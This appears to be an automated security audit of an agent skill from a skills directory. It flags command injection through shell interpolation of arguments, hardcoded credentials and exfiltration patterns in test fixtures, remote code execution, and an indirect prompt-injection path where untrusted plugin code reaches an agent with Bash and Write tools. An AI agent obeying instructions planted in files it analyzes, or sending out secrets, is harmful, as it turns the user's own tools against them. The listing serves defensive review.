The Agent Skills Directory

[COMMAND_EXECUTION]: The mine-plugins.md and mine-skill.md commands interpolate user-provided arguments directly into shell command strings (python3 ... --path "$ARGUMENTS"). This pattern is susceptible to command injection if the input is not strictly validated or escaped before execution.\n- [CREDENTIALS_UNSAFE]: The test file tests/flawed-plugin/scripts/bad_script.py contains hardcoded credentials, including an Authorization header and an API key constructed through string concatenation, demonstrating unsafe secret handling.\n- [DATA_EXFILTRATION]: Files in the tests/flawed-plugin/ directory demonstrate patterns for data exposure and exfiltration, such as accessing the DATABASE_PASSWORD environment variable and transmitting data to external servers using requests.post and curl.\n- [PROMPT_INJECTION]: The skill architecture is vulnerable to indirect prompt injection as it ingests untrusted code from third-party plugins (Ingestion points: SKILL.md Step 3, mine-plugins.md Step 3) without sanitization or boundary markers. Combined with high-privilege capabilities (Bash, Write tools in agents/l5-red-team-auditor.md), this allows malicious instructions in analyzed files to potentially compromise the agent.\n- [REMOTE_CODE_EXECUTION]: The skill includes patterns for dynamic specification fetching from remote URLs and contains test fixtures that execute remote requests, which could be leveraged to execute arbitrary code if the sources are untrusted or the execution logic is flawed.

synthesize-learnings